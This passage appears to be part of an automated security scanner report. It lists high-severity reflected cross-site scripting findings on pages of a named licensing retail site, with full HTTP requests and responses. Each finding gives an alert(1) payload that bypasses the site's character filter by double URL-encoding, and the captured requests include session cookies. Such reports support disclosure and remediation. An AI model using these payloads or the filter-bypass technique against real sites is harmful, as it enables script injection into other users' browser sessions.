<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Stadiums</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=73&4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1&4c355%27style%3d%27x%3aexpression%28alert%281%29%29%272ca472c83b2=1&4c355'style='x:expression(alert(1))'2ca472c83b2=1&fromsla=T'>
...[SNIP]...

1.58. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Turner-Contact-Us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1590873402:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=947
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33583


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Contact Us</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...
...[SNIP]...
.turnerlicensing.com/s.nl?it=I&id=86&6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1&6dd9c%27style%3d%27x%3aexpression%28alert%281%29%29%277f7d614df6b=1&fromsla=T&6dd9c'style='x:expression(alert(1))'7f7d614df6b=1'>
...[SNIP]...

1.59. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Turner-Email-Sign-Up

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811326705:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=863
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33500


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Email Sign Up</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=87&41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1&41989%27style%3d%27x%3aexpression%28alert%281%29%29%27cc1e08c1a24=1&41989'style='x:expression(alert(1))'cc1e08c1a24=1&fromsla=T'>
...[SNIP]...

1.60. http://www.turnerlicensing.com/app/site/backend/additemtocart.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /app/site/backend/additemtocart.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f08f"style%3d"x%3aexpression(alert(1))"b8d118caa4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f08f"style="x:expression(alert(1))"b8d118caa4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /app/site/backend/additemtocart.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.turnerlicensing.com/espn/8210571
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.2.10.1290274971; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NS_VER=2010.2.0; __utmc=1
Content-Length: 72

c=1034828&n=3&custcol_guid=&buyid=11004&category=-174&itemid=11004&qty=1&6f08f"style%3d"x%3aexpression(alert(1))"b8d118caa4c=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:25:15 GMT
Server: Apache
Expires: 0
NS_RTIMER_COMPOSITE: 334783567:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=v4c1MySL1p0gL2nbLZHk94nTQZGQHFCJ4k6L5cT00zHyhVFhPFVhqQbJbcg4bJ0T4kPPLZ2nX8WH7lTVw1vLcypZnt7GdtqwVy3jMyrRvrYkKX2Kngv12XQXqGQQbTy7!1338605686; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:25:17 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 518

<html><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><body onload="if (document.forms[0].x.value=='g'){document.forms[0].x.value='b';document.location='/s.nl?sc=3&6f08f"style="x:expression(alert(1))"b8d118caa4c=1&custcol_guid=&docookiecheck=T';} else if (document.forms[0].x.value=='b') {document.forms[0].x.value='f';history.back();}else {document.forms[0].x.value='b';history.forward();}/*NLStickyResponseWrap
...[SNIP]...

1.61. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /book_covers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:23 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1222437526:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=954
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100201


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Covers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175964&c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1&c755e'style='x:expression(alert(1))'f5f16d43fab=1&c755e%27style%3d%27x%3aexpression%28alert%281%29%29%27f5f16d43fab=1&fromsla=T'>
...[SNIP]...

1.62. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /box_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:22 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1666338165:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100396


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Box Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338446&45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1&fromsla=T&45e75'style='x:expression(alert(1))'5e5156453d=1&45e75%27style%3d%27x%3aexpression%28alert%281%29%29%275e5156453d=1'>
...[SNIP]...

1.63. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /composition_books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -259193890:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=592
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100546


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Composition Books</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175955&68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1&68ea5'style='x:expression(alert(1))'2936e399c82=1&68ea5%27style%3d%27x%3aexpression%28alert%281%29%29%272936e399c82=1&fromsla=T'>
...[SNIP]...

1.64. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /desk_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2001985876:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=978
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100232


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Desk Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338397&6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1&6de83'style='x:expression(alert(1))'5840fdf7ac4=1&fromsla=T&6de83%27style%3d%27x%3aexpression%28alert%281%29%29%275840fdf7ac4=1'>
...[SNIP]...

1.65. http://www.turnerlicensing.com/espn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /espn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f4c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527718afdfa6fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0f4c'style='x:expression(alert(1))'718afdfa6fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /espn?f0f4c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527718afdfa6fa=1 HTTP/1.1
Accept: */*
Referer: http://www.turnerlicensing.com/espn/8210571
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.2.10.1290274971; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NS_VER=2010.2.0; __utmc=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:24:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:24:49 GMT
NS_RTIMER_COMPOSITE: -1146854865:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=1JdtMySRLTnhJyygt11yn8R6NhkBRYpmnKtlytcc1mZLhVlT8dKJQpcp5sJ3XSZz31F02NhrhytWhCZRGvp74sL8CJJptLB8f3xr63h2qL21Gfn84c0Z8HY8VTWySpKQ!1338605686; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:24:50 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 47444


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESPN</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
//www.turnerlicensing.com/s.nl?sc=74&f0f4c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527718afdfa6fa=1&f0f4c%27style%3d%27x%3aexpression%28alert%281%29%29%27718afdfa6fa=1&fromsla=T&f0f4c'style='x:expression(alert(1))'718afdfa6fa=1'>
...[SNIP]...

1.66. http://www.turnerlicensing.com/espn/8210571 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /espn/8210571

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e859e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252756d71373043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e859e'style='x:expression(alert(1))'56d71373043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /espn/8210571?e859e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252756d71373043=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.turnerlicensing.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290274971; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NS_VER=2010.2.0; __utmc=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:25:38 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:25:39 GMT
NS_RTIMER_COMPOSITE: -1255098964:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=Z92dMySCqRnfZKhn66JSdfcHJpRSsjGV2dYb3n724hvyX212qyfPCGnjv1JtlTTS3ZL8ZbmdNzh01vLywD7NYjn8xLxJp8f7QY0FNWKm56WgQQYgny1H7jDw2cpLJ0Dn!1338605686; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:25:41 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 59990


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESPN</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
censing.com/s.nl?sc=74&it=A&id=11004&e859e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252756d71373043=1&e859e%27style%3d%27x%3aexpression%28alert%281%29%29%2756d71373043=1&fromsla=T&e859e'style='x:expression(alert(1))'56d71373043=1'>
...[SNIP]...

1.67. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.

